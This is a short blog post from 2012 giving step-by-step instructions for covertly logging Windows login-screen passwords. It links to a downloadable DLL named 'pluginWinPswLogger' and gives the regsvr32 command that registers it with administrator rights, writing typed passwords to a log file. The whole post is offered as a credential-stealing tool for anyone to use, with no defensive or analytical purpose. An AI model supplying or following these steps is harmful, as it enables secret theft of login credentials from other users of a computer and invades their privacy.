Friday, December 14, 2012

How to LOG|Record Windows(ALL) Login Password

 


How to Log the password of windows Login screen ?

Well i know most of em are using so many keyloggers and trojans that records keystrokes after login to the windows.
Do you know that we can even record the keystrokes without needing of any driver to load.
This is just a dll file ( Dynamic Link Library )

How to use ?


Download this file first

http://www.ziddu.com/download/14626640/pluginWinPswLogger2.rar.html

Now run the following command using command prompt
regsvr32 /n /i:c:\xxx.log c:\pluginWinPswLogger.dll

Note: Command prompt should have Administrator permissions to get the log saved .

You are actually registering the DLL with a command line

/i:c:\xxx.log is the path you want to save the passwords typed
c:\pluginWinPswLogger.dll is the file you downloaded just now


This works on all windows operating systems :) with perfect permissions

No comments:

Post a Comment